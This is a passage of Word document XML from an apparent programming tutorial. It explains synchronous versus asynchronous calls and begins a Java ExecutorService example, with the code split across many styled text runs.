      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3712C61E"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3077137"/>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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66473F64"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3077137"/>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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041316FD" w14:textId="72463B24"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3077137"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4172372F" w14:textId="77777777" w:rsidR="00BB17F1" w:rsidRDefault="00BB17F1" w:rsidP="00B17288">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FDE20C1" w14:textId="0B57C6CC"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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479B54A5"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ask 1 Started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0B1130"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ask 1 Finished</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9F30B6"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ask 2 Started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221C7A87"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ask 2 Finished</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399560AA"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this example, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Task 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> has to finish before </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Task 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can start, as the program execution is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> during task1() and task2().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AA2882" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B1728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576F7EC">
          <v:rect id="_x0000_i1174" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E0D965" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B172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synchronous Call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0100CD30"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an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous call</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the program does </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not wait</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the operation to complete. The operation is executed in the background, and the program continues executing other tasks without waiting for the current one to finish. The calling thread </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>does not block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> but instead proceeds to the next task. The result of the operation is usually provided via a callback or a future result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CC6795" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B172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haracteristics of Asynchronous Call:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAE7B00" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B17288">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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n-blocking:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The caller is free to continue execution while waiting for the task to finish in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B172FF" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B17288">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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rallel Execution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Multiple tasks can run concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C95876F" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B17288">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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allback/Promise:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Often involves some mechanism to handle the result once the operation is complete (like a callback function, promise, or future).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F79B59F" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B172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5BE35B2B"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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> java</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>util</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2D5A3C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EB92EE"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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AsynchronousExample</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127073DA"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F193F4B"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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Task 1 Started"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069E1CEE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC89386"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Asynchronous task execution using ExecutorService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD07D4D"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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> executor </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Executors</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>newSingleThreadExecutor</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0863FC78"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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Future</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;?&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> future1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> executor</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>submit</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED9470E"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7087DE84"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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3000</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
